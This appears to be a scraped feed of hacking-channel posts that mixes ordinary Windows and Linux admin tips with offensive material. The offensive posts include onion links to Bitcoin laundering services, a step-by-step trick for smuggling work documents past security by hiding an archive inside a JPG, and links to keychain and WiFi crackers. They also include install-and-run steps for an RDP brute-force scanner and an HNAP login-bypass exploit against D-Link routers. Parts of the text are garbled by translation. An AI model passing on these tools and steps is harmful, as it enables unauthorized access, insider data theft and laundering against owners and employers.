▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS POPULAR PORTS USED BY ATTACKERS :

TCP port 21 — FTP (File Transfer Protocol)

TCP port 22 — SSH (Secure Shell)

TCP port 23 — Telnet

TCP port 25 — SMTP (Simple Mail Transfer Protocol)

TCP and UDP port 53 — DNS (Domain Name System)

TCP port 443 — HTTP (Hypertext Transport Protocol) and HTTPS (HTTP over SSL)

TCP port 110 — POP3 (Post Office Protocol version 3)

TCP and UDP port 135 — Windows RPC

TCP and UDP ports 137–139 — Windows NetBIOS over TCP/IP

TCP port 1433 and UDP port 1434 — Microsoft SQL Server

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to use Sudo when used with Output Redirection or Pipe:

A) When using sudo with output redirection (>) or pipe (|), bash displays a Permission denied error message.

B) Next, I'll show you different ways to solve this problem.

Use sudo with tree
For example, to redirect the output from echo 1 to ip_forward, run:

$ sudo echo 1> / proc / sys / net / ipv4 / ip_forward
bash: / proc / sys / net / ipv4 / ip_forward: Permission denied
The above sudo command resulted in a permission denied error because the redirection is done by a shell that doesn't have write permission.

C) We can use the sudo command with the tee command to fix this error:

$ echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward
With the approach described above, the command executed before the pipe will not be executed as the root user (echo 1).

D) This is useful if you just want the output of a program that does not require root privileges.

If the command before the channel requires root, we could use sudo before each command, for example:

$ sudo echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null

E) A similar approach that we can use to write "1" to the file "ip_forward" as in the previous examples is to level up the write process to the file.

Here's an example:

$ sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null << EOF
1
EOF

Start the shell with sudo -c

F) Another popular approach is to start another shell as root with the -c option.

Example:

$ sudo sh -c 'echo 1> / proc / sys / net / ipv4 / ip_forward'
Start the shell with sudo -s

G) Another way is to start a shell with sudo -s and then execute the command:

$ sudo -s
# echo 1> / proc / sys / net / ipv4 / ip_forward
# ^ D
$
With a Bash script
Another way to run sudo with a redirect or pipe is to create a bash script with all your commands and run that script with sudo.

Let's see how we can implement this.

First, we need to create a new file using any text editor like nano, vim, gedit or whatever.

Let's call it myscript.sh.

Then paste the following commands into myscript.sh and save the file:

#! / bin / sh
echo 1> / proc / sys / net / ipv4 / ip_forward
Now you just need to run the myscript.sh file using the sudo command:

$ sudo myscript.sh

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BTC- DEEP WEBSITES:

http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry

http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins

http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins

http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin

http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME CMD COMMANDS USED BI HACKERS:

1) Copy Path on Folder Drop.

I had a file buried in C:\xampp\htdocs\Vonster\wp-content\themes\twentytwelve that I needed but look at that folder path: if I manually type it I’ll instantly make myself susceptible to all kinds of typos plus I’m lazy and couldn’t care less about typing folder paths.

To paste the full path, just drag the folder and drop it into the command prompt.

In my case I typed cd in the command prompt and then dragged my folder into the command window.

2) View history with F7
One way to recount the list of commands you typed during a session is to press the up and down arrow keys. Up goes back in time and Down moves forward to the present. You probably already knew that; however, there’s an alternate way that can save you a few keystrokes.

Pressing F7 lets you see your 10 most recent commands in a single glance. Now you can arrow up or down and press enter on the exact command you need to recall.

3) Pretty Print the Current Directory
Whenever you want to view the directory contents you type dir but sometimes you just want to view the structure without the datestamps and file sizes. Welcome to the tree /a command.

tree let’s you view all the folders and subfolders of the current directory as a rudimentary ASCII art print out.

Since the output is usually long, I always add the redirection operator to send the results to a file.

Command Prompt tree /a commandCommand Prompt tree /a command

And here’s the text file I saved the output to.

I entered this command from C:\xampp\htdocs\Vonster. If I entered it from C:\xampp\htdocs\ I would get every folder and subfolder in the htdocs parent

tree /a > c:\vonsterWebsite.txt
Command Prompt tree /a command outputCommand Prompt tree /a command output

4) Send Command Output to the Clipboard
A related command is the clip option. After any command insert a space then type the vertical pipe (it’s right below the backspace and shares a key with the backslash). After the pipe insert another space and type clip.

For example to send the ipconfig results to your clipboard rather than the command prompt window – type this:

ipconfig /all | clip
Send Output to the ClipboardSend Output to the Clipboard

5) Get Help
The quick way to get help on a command is to tack on a baskslash and question mark.

For example, let’s say I want to use netsh but I forgot how to view all the Wireless Profiles on my computer.

I enter:

netsh /?


Reference: https://sites.google.com/site/betheboos/home/command-prompt-hacks-and-tricks-xp
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑In Linux systems, there are three main types of logging subsystems:

1) Connection time log: It is executed by multiple programs, and records are written to /var/log/wtmp and /var/run/utmp. Programs such as login will update the wtmp and utmp files so that the system administrator can track who is where Log in to the system when (The utmp and wtmp log files are the key to most Linux log subsystems. They save the user login and logout records. Information about the currently logged-in user is recorded in the file utmp; login and logout are recorded in the file wtmp; data exchange , Shutdown and restart machine information are also recorded in the wtmp file. All records include a time stamp.)

2) Process statistics: executed by the system kernel, when a process terminates, a record is written to the process statistics file (pacct or acct) for each process. The purpose of process statistics is to provide command usage statistics for basic services in the system.

3) Error log: Executed by the syslogd (8) daemon, various system daemons, user programs and kernels report notable events to the file /var/log/messages through the syslogd (3) daemon. In addition, many Unix programs create logs. Servers that provide network services like HTTP and FTP also maintain detailed logs.

Log directory: /var/log (default directory)

View process log cat /var/log/messagesp4

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Now all ubuntu users should update their systems.
New Vulnerability in Ubuntu gdm3 could allow attackers to gain root access.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 Accessing ESXi console screen from SSH session :

1) As you can imagine, SSH access to ESXi host is required
Before accessing the DCUI from an SSH session, it is important to note that making any changes to the network settings may result in management issues via vCenter Server, vSphere Client, or SSH.
Network changes should only be done through a console session (eg DRAC, iLO, KVM) to avoid host management issues.

2) Changing the network settings using this command may render the host unusable and may require a reboot to recover.

Run this command to access DCUI from an SSH session:

~ # dcui

3) To exit DCUI, press Ctrl + C.

DCUI will provide you with this screen, which is colorless

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

macOS keychain cracking tool.

https://github.com/macmade/KeychainCracker

🦑How To Build Mobile App Without Programming - Build 14 Apps!
FREE

Build Audio App
Build Mortgage Calculator App
Build Count Down Timer App
Build Email Marketing App
Build Messenger App - With Google and Facebook Login Features
Build Slot Machine App
Build Voice Recorder App
Build Global Positioning System (GPS) App
Build Photo Sharing App
Build eBook App - Turn any PDF into eBook App
Build News Feed App
Build Memory Game App
Build Push Notifications App
Build Geo-Fencing App
Build Facebook App
Bypass Mobile App's Web Page Link to Mobile App Link
Customize Mobile App Tap - Better User Interface (UI) Design and Better User Experience (UX) Design
Discover Mobile App Monetization Secrets
Discover Precaution Steps That Need To Be Taken on Live Ads
Learn How To Use Google Analytics To Track Mobile App Activity
Learn How To Use Adobe Photoshop and Adobe Illustrator in Just 20 Minutes!
Discover Online Tool To Quickly Generate Different Sizes of Mobile App Icons
Discover Ways To Engage With Mobile App Users
Learn How To Export Application Binary and Upload to Multiple Mobile App Stores

https://www.udemy.com/course/how-to-build-mobile-app-without-programming-skills/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to quietly take a document from work👨⚕️

1) So, again, the harsh security officers from the security departments prevent you from squeezing documents from work?) How to transfer the necessary document to yourself without a palette?

2) The main idea is to make the document look like a harmless picture so that we can safely send it by mail or drop it onto a USB-flash, without fear of being burned. comrades of security guards will reflect that all actions were performed with a picture.

3) So we have at our disposal a file with service information “Doc.rtf” and a picture “picture.jpg” (This can be a photo from a cooperative, a volunteer clean-up, etc.)

4) First, we archive a text file with an archiver (in the example I used 7-zip) in the “.rar” format and get Doc.rar.

5) Now to blind them, we type in the command line:

D: \ shared> copy / b picture.Jpg + doc.rar rezult.jpg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE WIFI CRACKER APPLICATION FOR ANDROID:

Step 1: before using this application you have to FORGET your current wifi connection other the scan will not work and you will be unable to attempt a connection.


Step 2: Before you can view any networks around you, you must enable location services through your settings. New android permissions require location services due to the network dealing with IP addresses.

> Download:
https://github.com/trevatk/Wifi-Cracker/tree/master/newAPK
https://github.com/trevatk/Wifi-Cracker/tree/master/oldAPK
https://github.com/trevatk/Wifi-Cracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔍 What process is listening on a port on Windows?

A) Using the command line
Use the following command to find out the process id (pid) listening on port 433 .

You can change this value to look for a different port.

netstat -aon | findstr ": 443" | findstr "LISTENING"
Conclusion:

TCP 0.0.0.0:443 0.0.0.0 0 LISTENING 2180
TCP 127.0.0.1:44312 0.0.0.0 0 LISTENING 4620
TCP [::]: 443 [::]: 0 LISTENING 2180


The last column of the output displays the process ID.

The output shows the pid is 2189 and 4620 for processes listening on port 443.

Use this process ID with the task list command to find the process name.

> tasklist / fi "pid eq 2190"

B) Using PowerShell Get-Process
The second method uses a PowerShell command to identify the process running on a specific port on Windows.

Start a PowerShell terminal and run the following command to find the name of the process running on port 443.

You can change the port number to check for other ports.

Get-Process -Id (Get-NetTCPConnection -LocalPort 443) .OwningProcess

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RDP HACKING
Script for automatic scanning of the address list for the presence of open 3389 ports, and then selecting the method and starting busting pair login / password.

To work correctly, the script requires the establishment: masscan, curl and FreeRDP.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/getdrive/Lazy-RDP

2) cd Lazy-RDP && chmod +x hydra/configure hydra/hydra src/rdp_brute.sh patator.py start INSTALL

3) Installing dependencies

./INSTALL

4) Running the script

./start

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to operate HNAP :

There are a couple of tools available to operate the HNAP.

Hnap0wn

The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass the administrative login for HNAP-enabled D-Link routers.

1) Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz
Download and unpack from the command line:

2) mkdir hnap0wn

3) cd hnap0wn

4) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz

5) tar xvzf 11101.tar.gz

6) This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device using a password or without a password if the device is vulnerable.

In the xml folder that comes with this program, there are several .xml files to do typical things.

🦑Example command:


./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁